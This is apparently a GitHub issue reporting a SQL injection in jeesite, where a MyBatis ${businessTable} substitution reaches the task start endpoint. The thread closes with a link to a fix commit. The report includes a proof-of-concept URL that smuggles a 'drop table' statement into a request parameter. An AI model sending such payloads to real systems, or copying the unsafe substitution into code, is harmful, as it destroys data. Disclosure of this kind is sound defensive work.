### ISSUE TITLE
mybatis tablename sql injection

### ISSUE THREAD

**Issue by BACMiao** [thinkgem/jeesite#515]
**sql mappings**

以下的**${businessTable}**存在SQL注入的风险

```xml
src/main/resources/mappings/modules/act/ActDao.xml
<mapper namespace="com.thinkgem.jeesite.modules.act.dao.ActDao">
    
	<update id="updateProcInsIdByBusinessId">
		UPDATE ${businessTable} SET 
			proc_ins_id = #{procInsId}
		WHERE id = #{businessId}
	</update>
	
</mapper>
```

**RequestMapping**

**com.thinkgem.jeesite.modules.act.web.ActTaskController** 类中的 **start** 方法

![image-20230516154826781](https://github.com/thinkgem/jeesite/assets/15136865/c7e729c4-a7a0-4eff-b4b0-3aabad780cae)

**Call Stack**

![image-20230516154624692](https://github.com/thinkgem/jeesite/assets/15136865/02908bc4-6cc1-431c-9c77-d08e5691872d)

**SQL Inject**

当用户为jdbc.url添加**&allowMultiQueries=true**并启动程序后，此时Spring允许批量更新，就能进行SQL注入了

<img width="816" alt="image-20230516154115876" src="https://github.com/thinkgem/jeesite/assets/15136865/fe2d4b43-f5d5-4b44-936a-5ccf2e07765b">

测试表为**aa表**

<img width="306" alt="image-20230516153725737" src="https://github.com/thinkgem/jeesite/assets/15136865/7bef7e38-6bf9-4a39-88bf-ce07c0dbc6e7">

任意用户执行以下url，

url: http://localhost:8080/jeesite/a/act/task/start?procDefKey=test_audit&title=dd&businessTable=79&businessId=oa_test_audit%20set%20proc_ins_id%20=%20%271%27%20where%20id=%2779%27;drop%20table%20aa;--

Mybatis将SQL进行拼接并删去**aa表**，

<img width="1413" alt="image-20230516153844650" src="https://github.com/thinkgem/jeesite/assets/15136865/e2482add-c1b7-4cd6-bf80-6eec18049007">

再次执行上述url时，此时已经不存在**aa数据表**了

<img width="919" alt="image-20230516153929226" src="https://github.com/thinkgem/jeesite/assets/15136865/432f42fd-d4df-4931-854b-ae26651824ee">

查看mysql，发现**aa表**已经被删除

<img width="309" alt="image-20230516153902090" src="https://github.com/thinkgem/jeesite/assets/15136865/a8d3238b-9e1d-449b-bcbe-970c0f67b743">

**Comment by heshaojin** [comment]
这是来自QQ邮箱的假期自动回复邮件。你好，我最近正在休假中，无法亲自回复你的邮件。我将在假期结束后，尽快给你回复。

**Comment by think-gem** [comment]
https://github.com/thinkgem/jeesite/commit/30750011b49f7c8d45d0f3ab13ed3a1a422655bb
